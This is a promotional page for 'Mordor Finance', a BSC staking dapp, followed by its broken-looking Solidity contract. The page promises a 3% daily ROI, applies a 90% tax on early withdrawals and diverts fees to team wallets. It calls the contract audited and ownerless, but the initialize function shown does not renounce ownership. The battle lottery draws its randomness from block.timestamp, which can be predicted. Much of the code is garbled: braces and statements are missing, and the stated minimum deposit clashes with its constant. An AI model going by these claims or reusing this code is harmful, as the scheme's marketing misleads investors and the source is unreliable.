🔓The contract

Immutable & Audited contract.

We as developpers took a great pleasure to create a new WEB3 DAPP that implement the most secure and powerfull concepts of the BSC blockhain.

The final contract is audited and owner renounced by design. Once the DAPP is initialized, it's becomes yours.

As you can observe, the contract is fully commented, take the time to read the important parts, and read it at least once. All is inside. No bullshit.

Read it from here

 *Submitted for verification at BscScan.com on 2022-11-17

// SPDX-License-Identifier: CC-BY-4.0
pragma solidity ^0.8.7;


     /$$      /$$                           /$$                     /$$$$$$$$ /$$                                                  
    | $$$    /$$$                          | $$                    | $$_____/|__/                                                  
    | $$$$  /$$$$  /$$$$$$   /$$$$$$   /$$$$$$$  /$$$$$$   /$$$$$$ | $$       /$$ /$$$$$$$   /$$$$$$  /$$$$$$$   /$$$$$$$  /$$$$$$ 
    | $$ $$/$$ $$ /$$__  $$ /$$__  $$ /$$__  $$ /$$__  $$ /$$__  $$| $$$$$   | $$| $$__  $$ |____  $$| $$__  $$ /$$_____/ /$$__  $$
    | $$  $$$| $$| $$  \ $$| $$  \__/| $$  | $$| $$  \ $$| $$  \__/| $$__/   | $$| $$  \ $$  /$$$$$$$| $$  \ $$| $$      | $$$$$$$$
    | $$\  $ | $$| $$  | $$| $$      | $$  | $$| $$  | $$| $$      | $$      | $$| $$  | $$ /$$__  $$| $$  | $$| $$      | $$_____/
    | $$ \/  | $$|  $$$$$$/| $$      |  $$$$$$$|  $$$$$$/| $$ /$$  | $$      | $$| $$  | $$|  $$$$$$$| $$  | $$|  $$$$$$$|  $$$$$$$
    |__/     |__/ \______/ |__/       \_______/ \______/ |__/|__/  |__/      |__/|__/  |__/ \_______/|__/  |__/ \_______/ \_______/

    TG: https://t.me/modorfinance
    DAPP: https://Mordor.Finance 
    Twitter: https://twitter.com/NoBullshitCorp

    # Have fun with this contract, send-us your comments :) 
    # To support us, send to the supportWallet. It will be reversed in our projects. NoBullshit.

contract MordorFinance { 

    // Variables are public
    bool    public initialized = false;  // The game will begin when this one will be true. 
    uint256 public launchDate  = 0;      // Keep the start date knowledge. 
    address public owner;                // Renounced contract owner value is "0x0000000000000000000000000000000000000000".

    // Constants are private
    uint256 private immutable secondsByDay                = 86400;        // A day is 86400 seconds. 
    uint256 private immutable dailyROIPercent             = 3;            // Rewards % of sender balance on period.
    uint256 private immutable tokenPerUnit                = 10000;        // How many token you get per one coin.
    uint256 private immutable feePercent                  = 10;           // Amount of fees.
    uint256 private immutable unstackFeesPercent          = 20;           // Amount of fee that stays in TVL when the user unstack.
    uint256 private immutable marketingFeePercent         = 40;           // Dedicated to the TVL growth.
    uint256 private immutable minClaimToAvoidSanityTax    = 6;            // Min claim to disable sustainability tax.
    uint256 private immutable sanityTaxAmountPercent      = 90;           // Sustainability tax amount.
    uint256 private immutable bonusDuration               = 7;            // Bonus period in days. 
    uint256 private immutable maxHoursWithNoFight         = 1;            // Max period without action to close the fight.
    uint256 private immutable minBonusPercent             = 1;            // The min % effort you can send to get bonus.
    uint256 private immutable maxBonusPercent             = 5;            // The max % effort allowed to get bonus.
    uint256 private immutable autoclaimMinInvest          = 3 ether;      // = 3.00 BNB / The amount that must be stacked to unlock the autoclaim feature.
    uint256 private immutable fightPrice                  = 2 * 1e16 wei; // = 0.02 BNB / The fixed price to fight in a battle.
    uint256 private immutable minStackAmount              = 5 * 1e16 wei; // = 0.05 BNB / The minimum amount to stack.
    // Addresses are constants  
    address private immutable devAddress       = 0x87F44E7516426e2626Ae1781Fafa00870f17B66F; // The team wallet to eat.
    address private immutable marketingAddress = 0x31C52757250D3498185168Cba7D5791635F487A7; // The marketing wallet to pay bills.
    address private immutable supportWallet    = 0xffb5FA2c14FB9aB5A2e1D0125517C2023879C110; // The wallet to dispatch community effort. 

     * Build the contract 
    constructor() { 
        owner = msg.sender;

     * Initialize the miner, the only owned method. Let's begins. 
    function initialize() public {
        require(msg.sender == owner);

        // Renounce owner by design.

        // From here, the contract is free as birds and belongs to investors.
        launchDate  = block.timestamp;
        initialized = true;

     *    ,---.   ,--.                ,--.    ,--.                                         ,--.  ,--.                
     *   '   .-',-'  '-. ,--,--. ,---.|  |,-. `--',--,--,  ,---.      ,---.  ,---.  ,---.,-'  '-.`--' ,---. ,--,--,  
     *   `.  `-.'-.  .-'' ,-.  || .--'|     / ,--.|      \| .-. |    (  .-' | .-. :| .--''-.  .-',--.| .-. ||      \ 
     *   .-'    | |  |  \ '-'  |\ `--.|  \  \ |  ||  ||  |' '-' '    .-'  `)\   --.\ `--.  |  |  |  |' '-' '|  ||  | 
     *   `-----'  `--'   `--`--' `---'`--'`--'`--'`--''--'.`-  /     `----'  `----' `---'  `--'  `--' `---' `--''--' 
     *                                                 `---'                                                      

    // Amount structure
    struct Amounts {
        uint256 stack;        // Total amount of the stacked value
        uint256 widthdrawal;  // Total amount of withdrawed value
        uint256 balance;      // Current balance (Stacked value + Added Rewards)
        uint256 claim;        // Claim count
        uint256 bonusPercent; // The bonus value percent, from [min] to [max]

    // Amount structure
    struct Dates {
        uint256 lastStack;           // The last user investment date
        uint256 lastClaim;           // When the last claim occurs
        uint256 bonusEnd;            // The buff end date
        uint256 autoclaimEnabled; // When the user has enabled the autoclaim

    // The investor structure
    struct Investor {
        string  name;
        Amounts amounts;
        Dates   dates;

    // Store investors by wallets adresses. 
    mapping(address => Investor) private investors;

     * Add new liquidity to the sender stack. 
     * @param referrer The referrer address, msg.sender here will have no rewards (L.295).
    function stack(address referrer) external payable {
        require(initialized, "Not started yet !");
        require(msg.value >= minStackAmount, "You must add more funds to stack. The minimum is 0.5 BNB.");

        uint256 fees = getDevFee(msg.value);

        // Reset the last action date.

        // Reset the last stack date.

        // Reset the sender claim counter.

        // Dispatch fees.

        // Give its reward to the referrer.
        handleReferrer(msg.value, referrer);

        // Add values to balance & investments.
        uint256 amountToAdd                   = msg.value - fees; 
        investors[msg.sender].amounts.stack   += amountToAdd; 
        investors[msg.sender].amounts.balance = getSenderBalance() + ((amountToAdd * tokenPerUnit) / 1e18); 

     * Unstack the sender investment, retains unstack fees in TVL, then transfer the rest.
    function unstack() external {
        require(initialized, "Not started yet !");
        require(investors[msg.sender].amounts.stack > 0, "You need to stack before unstack!");

        uint256 unstackFees = getUnstackFees(

        // Reset the last action date.

        // Reset the last stack date.

        // Reset the claim counter.

        // Transfer liquidity to user.
            sub(investors[msg.sender].amounts.stack, unstackFees)

        // Reset send investments.
        investors[msg.sender].amounts.stack = 0;

        // Reset the token balance
        investors[msg.sender].amounts.balance = 0; 

     * Add the liquid value to the sender balance
    function claim() public { 
        require(initialized, "Not started yet !");
        require(investors[msg.sender].amounts.stack > 0, "You need to stack before claim!");
        require(getSenderNextClaimDate() < block.timestamp,"You need to wait before claiming.");
        // Lock liquidity to sender balance.
        investors[msg.sender].amounts.balance = getSenderBalance() + getSenderLiquidAmount();

        // The last claim date is block.timestamp.

        // Add 1 claim to the user count.

     * Send back liquidity to the sender, collect tax for dev & marketing
    function withdraw() public {
        require(initialized, "Not started yet !");
        require(getSenderNextClaimDate() < block.timestamp,"You need to wait before withdraw.");
        require(getSenderWithdrawableBalance() > 0); 

        // Get the amount to withdraw.
        uint256 currentAmount = taxeWithdrawForSustainability(getSenderWithdrawableAmount()); 
        // Reset the last action date.

        // Reset the claim counter.

        // Transfer liquidity to user.

     * Taxe withdraw to keep the contract healthy for investisors
     * @param amount The wanted amount to withdraw
    function taxeWithdrawForSustainability(uint256 amount) private view returns (uint256) {
        // Hungry players taxe.
        if (getSenderClaimCount() < minClaimToAvoidSanityTax) {
            return (amount * (100 - sanityTaxAmountPercent)) / 100;

        return amount;

     * Obtain a multiple bonus by burning your tokens to the cause. 
     *   Given funds will be reversed to support our projects. 
    function obtainNewBonus(uint256 amountPercent) public {
        require(initialized, "Not started yet !");
        require(amountPercent >= minBonusPercent, "The min bonus required is higher to obtain a bonus.");
        require(amountPercent <= maxBonusPercent, "The max bonus is reached.");

        // Reset the last action date.

        // Reset the last claim date.

        // How much to burn ?
        uint256 currentSenderBalance = getSenderBalance();
        uint256 amountToBurn         = (currentSenderBalance * amountPercent) / 100;
        uint256 amountToTransfert    = (amountToBurn * 1e18) / tokenPerUnit;

        // Effective burn of the amount.
        investors[msg.sender].amounts.balance = currentSenderBalance - amountToBurn;

        // Add the bonus to the user.
        investors[msg.sender].amounts.bonusPercent = amountPercent;

        // Transfer liquidity to the support wallet.

     * Reset the bonus end date.
    function setNewBonusExpirationDate() private {
        if (getSenderBalance() == 0) {
        investors[msg.sender].dates.bonusEnd = block.timestamp + (secondsByDay * bonusDuration);

     * Returns the sender next claim timestamp.
     * @return uint256
    function getBonusEndDate() public view returns (uint256) {
        return investors[msg.sender].dates.bonusEnd;

     * Give some reward to the referrer of the new user
     * @param amount   The amount of deposit 
     * @param referrer The address of the referrer
    function handleReferrer(uint256 amount, address referrer) private {

        // The sender can't be hiself referrer. 
        if (referrer == msg.sender) {
        // Dispatch 
        uint256 amountForReferrer           = (amount * tokenPerUnit) / 1e18;  // Convert coins to token. 
        investors[referrer].amounts.balance += (amountForReferrer * 10) / 100; // 10% for the referrer. 

     * Calculate dev fee amount
     * @param amount The amount of deposit 
     * return int
    function getDevFee(uint256 amount) private pure returns (uint256) {
        return div(mul(amount, feePercent), 100); 

     * Calculate dev fee amount
     * return int
    function getUnstackFees(uint256 amount) private pure returns (uint256) {
        return div(mul(amount, unstackFeesPercent), 100);

     * Dispatch Marketing & Dev fees
    function collectFees(uint256 fee) private {
        uint256 fee2 = (fee * marketingFeePercent) / 100;

        payable(devAddress).transfer(fee - fee2);

     * Returns the smart contract balance
     * @return uint256
    function getBalance() public view returns (uint256) {
        return payable(address(this)).balance;

     * Returns the sender balance
     * @return uint256
    function getSenderBalance() public view returns (uint256) {
        uint256 secondsPassed  = getSecondPassedFromLastClaim();
        uint256 currentBalance = investors[msg.sender].amounts.balance;
        uint256 daysCount      =  (block.timestamp - investors[msg.sender].dates.lastClaim) / secondsByDay;
        // Implement the autoclaim algorithm. Unlock days limit & autompound value.
        if (
            investors[msg.sender].dates.autoclaimEnabled != 0 &&
            secondsPassed > secondsByDay
        ) {
            // Iterate over day to add the autoclaimed amounts
            for (uint256 i = 0; i < daysCount; i++) {
                currentBalance += getRewardsFromBalance(currentBalance);

        return currentBalance;

     * Returns the sender balance
     * @return uint256
    function getMinClaimToAvoidSanityTax() public pure returns (uint256) {
        return minClaimToAvoidSanityTax;

     * Returns the sender next claim timestamp.
     * @return uint256
    function getSenderNextClaimDate() public view returns (uint256) {
        if (getSenderBalance() == 0) {
            return 0;
        return getSenderLastClaimDate() + secondsByDay;

     * Set the sender last action date to block.timestamp.
    function resetLastClaimDate() private {
        investors[msg.sender].dates.lastClaim = block.timestamp;

     * Set the sender last stack date to block.timestamp.
    function resetLastStackDate() private {
        investors[msg.sender].dates.lastStack = block.timestamp;

     * Enable the autoclaim feature
    function enableAutoclaim() public {
        require(getSenderStack() >= autoclaimMinInvest, "You need to stack more to enable autoclaim.");
        investors[msg.sender].dates.autoclaimEnabled = block.timestamp;

     * Disable the autoclaim
    function disableAutoclaim() public {
        investors[msg.sender].dates.autoclaimEnabled = 0;

     * Enable the autoclaim feature
    function getSenderLastClaimDate() public view returns (uint256) {
        return investors[msg.sender].dates.lastClaim;

     * Add 1 to the send claim count to allow him to avoid tax a day.
    function bumpSenderClaimCount() private {
        investors[msg.sender].amounts.claim = getSenderClaimCount()  + 1;

     * Set the sender last action date to block.timestamp.
    function resetClaimCounter() private {
        investors[msg.sender].amounts.claim = 0; 

     * Return the autoclaim count. 
     * @return uint256
    function getSenderClaimCount() public view returns (uint256) {
        // Implement the autoclaim feature.  
        uint autoclaimCount = investors[msg.sender].dates.autoclaimEnabled > 0 ?
             (block.timestamp - investors[msg.sender].dates.lastClaim) / secondsByDay : 

        return investors[msg.sender].amounts.claim + autoclaimCount; 

     * Return the total value invested by the sender
     * @return uint256
    function getSenderStack() public view returns (uint256) {
        return investors[msg.sender].amounts.stack;

     * Return the current user liquid reward
     * @return uint256
    function getSenderLiquidAmount() public view returns (uint256) {
        uint256 secondsPassed = getSecondPassedFromLastClaim();     
        uint256 daysCount     = (block.timestamp - investors[msg.sender].dates.lastClaim) / secondsByDay;
        uint256 secondsLeft   = secondsPassed - (daysCount * secondsByDay);
        uint256 dailyReward   = getSenderBalance() * getCurrentMultiple() / 100;

        if(investors[msg.sender].dates.autoclaimEnabled == 0 && secondsPassed > secondsByDay) {
            return dailyReward;
        // Add the current day rewards
        return ((dailyReward * secondsLeft * 1e18) / secondsByDay) / 1e18;  //Avoid overflow

     * Return the current withdrawable liquidity converted as coin.   
     * @return uint256
    function getSenderWithdrawableAmount() public view returns (uint256) {
        return (getSenderWithdrawableBalance() * 1e18) / tokenPerUnit; 

     * Return the current withdrawable amount of token
     * @return uint256
    function getSenderWithdrawableBalance() public view returns (uint256) {
        require(investors[msg.sender].amounts.stack > 0, "You need to stack to have balance.");

        uint256 currentBalance = getSenderBalance(); 
        uint256 daysCount      = (block.timestamp - investors[msg.sender].dates.lastClaim) / secondsByDay;
        uint256 lastDayRewards = 0;

        // For non-autoclaim enabled or period is less than a day.
        if(investors[msg.sender].dates.autoclaimEnabled == 0 || getSecondPassedFromLastClaim() <= secondsByDay) {
            return getSenderLiquidAmount(); 

        // Autoclaim withdrawable funds are the last day balance. Iterate to find the amount.
        for (uint256 i = 0; i < daysCount; i++) { 
            lastDayRewards = getRewardsFromBalance(currentBalance);
            currentBalance += lastDayRewards;

        return lastDayRewards; 

     * Return the current multiplier for the sender
     * @return uint256
    function getCurrentMultiple() public view returns (uint256) {
        return dailyROIPercent + getSenderBonusPercent();

     * Return the daily reward for the sender
     * @return uint256
    function getRewardsFromBalance (uint256 balance) private view returns (uint256) {
        return (balance * getCurrentMultiple()) / 100;

     * Return the estimated daily reward for the sender
     * @return uint256
    function getSecondPassedFromLastClaim() public view returns (uint256) {
        return block.timestamp - getSenderLastClaimDate();

     * Return the estimated time left with the current bonus
     * @return uint256
    function getRemainingBonusSeconds() public view returns (uint256) {
        return investors[msg.sender].dates.bonusEnd > 0 && block.timestamp < investors[msg.sender].dates.bonusEnd 
            ? investors[msg.sender].dates.bonusEnd - block.timestamp : 0;

     * Return the bonus amound, the max is maxBonusPercent. Heavy investors have some base bonus. 
     * @return uint256
    function getSenderBonusPercent() public view returns (uint256) {

        // Implement a special bonus for our best investors. 
        uint256 baseStackedBonus = getSenderStack() / (10 * 1e18);

        // Implement the regular bonus that investors can buy by burning token with obtainNewBonus().
        uint256 buyedBonus       = getRemainingBonusSeconds() > 0 ? investors[msg.sender].amounts.bonusPercent : 0; 
        uint256 overallBonus     = baseStackedBonus + buyedBonus; 
        // The max available bonus is effort
        return overallBonus > maxBonusPercent ? maxBonusPercent : overallBonus; 

     *   ,-----.            ,--.    ,--.  ,--.                   ,---.                 ,--.  ,--.                
     *   |  |) /_  ,--,--.,-'  '-.,-'  '-.|  | ,---.  ,---.     '   .-'  ,---.  ,---.,-'  '-.`--' ,---. ,--,--,  
     *   |  .-.  \' ,-.  |'-.  .-''-.  .-'|  || .-. :(  .-'     `.  `-. | .-. :| .--''-.  .-',--.| .-. ||      \ 
     *   |  '--' /\ '-'  |  |  |    |  |  |  |\   --..-'  `)    .-'    |\   --.\ `--.  |  |  |  |' '-' '|  ||  | 
     *   `------'  `--`--'  `--'    `--'  `--' `----'`----'     `-----'  `----' `---'  `--'  `--' `---' `--''--' 

    // Battle Structure
    struct Battle {
        uint256 startDate;                          // When the battle begins.
        uint256 endDate;                            // When the battle took end. 
        uint256 lastFightDate;                      // When the last fight occured.
        uint256 jackpot;                            // The battle total rewards pool.
        mapping(address => uint256) totalPerSender; // Store invested amount by investors.
        address[] results;                          // Store the results of the battle.

    Battle[] private battles;                       // Stores battles in a pool.

     * How many battles ever created
     * @return uint256
    function getBattlesCount() public view returns (uint256) {
        return battles.length;

     * Main action to fight againts all other investors.
     * Will: 
     *  - Start battles
     *  - Add investors to the battle 
     *  - Shuffle results
     *  - Close battles
    function fight() external payable {
        require(initialized, "Not started yet !");
        require(getSenderBalance() > 0, "You need to have stacked funds to fight.");
        require(msg.value == fightPrice, "Fighting has a price.");
        // Check if we need to close a previous battle.
        if (hasBattleTookEnd()) {

        // Do we need to create a new battle instance
        if (battles.length == 0 || battles[battles.length - 1].endDate > 0) {
            battles[battles.length - 1].startDate = block.timestamp;

        // Store the player for further usage.
        if (battles[battles.length - 1].totalPerSender[msg.sender] == 0) {
            battles[battles.length - 1].results.push(msg.sender);

        // Add the fight price to the total per sender & jackpots
        battles[battles.length - 1].totalPerSender[msg.sender] += msg.value;
        battles[battles.length - 1].jackpot += msg.value;

        // Then, let's all the token fight each others! 
        address[] memory results = battles[battles.length - 1].results; 
        uint256 entropy          = block.timestamp; 

        // Implement Fisher-Yates shuffle to randomize results
        for(uint256 i = results.length - 1 ; i > 0; i--) {
            uint256 swapIndex    = entropy % (results.length - i);
            address currentIndex = results[i];
            address indexToSwap  = results[swapIndex];
            results[i]           = indexToSwap;
            results[swapIndex]   = currentIndex;

        // Set new results and store the last fight date. 
        battles[battles.length - 1].results       = results; 
        battles[battles.length - 1].lastFightDate = block.timestamp;

     * Check if the last battle is over
     * @return bool
    function hasBattleTookEnd() public view returns (bool) {
            battles.length > 0 &&
                (block.timestamp - battles[battles.length - 1].startDate) > secondsByDay || 
                (battles[battles.length - 1].lastFightDate - battles[battles.length - 1].startDate) > (60 * 60 * maxHoursWithNoFight)

     * End the battle and send the rewards to winners wallets
    function closeBattle() private {
        require(battles.length > 0, "There no battle yet, please fight!"); 
        address[] memory battleResults = getCurrentBattleResults();
        uint256 winnersCount           = getWinnersCount(); 

        // Implement the 2/3 battle rewards to winners, the last 1/3 stays in TVL.
        uint256 battleRewardsPart = (2 * battles[battles.length - 1].jackpot) / 3;

        // Get the amount deposited by winners players only 
        uint256 winnerJackpotPart = getWinnersJackpotAmount(winnersCount);

        // Iterate over winners to transfer gains.
        for (uint256 i = 0; i < winnersCount; i++) {
            address player        = battleResults[i]; 
            uint256 battleDeposit = battles[battles.length - 1].totalPerSender[player];

            // The reward depends on the battle participation, the more you fight, the more you win. 
            uint256 playerReward  = battleRewardsPart * (battleDeposit / winnerJackpotPart);

            // Transfer rewards to winners!

        battles[battles.length - 1].endDate = block.timestamp;
     * Returns the jackpot part deposited by winners 
     * @param winnersCount How many winner for the current battle. 
     * @return uint256
    function getWinnersJackpotAmount(uint256 winnersCount) private view returns(uint256) {
        uint256 amount = 0; 
        // Iterate over winners to sum deposits .
        for (uint256 i = 0; i < winnersCount; i++) {
            address player = battles[battles.length - 1].results[i]; 
            amount += battles[battles.length - 1].totalPerSender[player];
        return amount; 

     * Getter that returns the current battle start date 
    * @return uint256
    function getCurrentBattleStartDate() public view returns (uint256) {
        return battles.length > 0 ? battles[battles.length - 1].startDate : 0;

     * How many battles ever created
     * @return uint256
    function getCurrentBattleJackpot() public view returns (uint256) {
        return battles.length > 0 ? battles[battles.length -1].jackpot : 0;

     * Getter that returns the current battle results 
     * @return memory
    function getCurrentBattleResults() public view returns (address[] memory) {
        return battles[battles.length - 1].results;
     * Getter that returns the amount of winners of the current battle 
     * @return uint256
    function getWinnersCount() public view returns (uint256) {
        if(battles.length == 0) {
            return 0; 
        return (getCurrentBattleResults().length + 2) / 3;  // Ceil winners count. 

     * Check if the sender is a winner \o/, or a ugly looser :(  
     * @return bool
    function doIWinTheBattle() public view returns (bool) {

        if(battles.length == 0) {
            return false; 

        address[] memory results = getCurrentBattleResults();

        for (uint256 i = 0; i < getWinnersCount(); i++) {
            if (address(results[i]) == address(msg.sender)) {
                return true;

        return false;
     * What's my battle position? 
     * @return uint
    function whatIsMyBattlePosition() public view returns (uint) {

        if(battles.length == 0) {
            return 0; 

        address[] memory results = getCurrentBattleResults();

        for (uint256 i = 0; i < results.length; i++) {
            if (address(results[i]) == address(msg.sender)) {
                return i + 1;

        return 0;
     * How many player are fighting?  
     * @return uint
    function getCurrentBattleTotalPlayer() public view returns (uint) {

        if(battles.length == 0) {
            return 0; 

        return getCurrentBattleResults().length;

     * Allow any external source to fill the contract, 
     *   send us some fees from your fork, we will develop fresh new contracts ;)
    receive() external payable {}

     * Math Utils

     * @dev Multiplies two numbers, throws on overflow.
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) {
            return 0;
        uint256 c = a * b;
        assert(c / a == b);
        return c;

     * @dev Integer division of two numbers, truncating the quotient.
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a / b; 
        return c;

     * @dev Substracts two numbers, throws on overflow (i.e. if subtrahend is greater than minuend).
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        assert(b <= a);
        return a - b;

     * @dev Adds two numbers, throws on overflow.
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        assert(c >= a);
        return c;

 * No bullshit. 

Last updated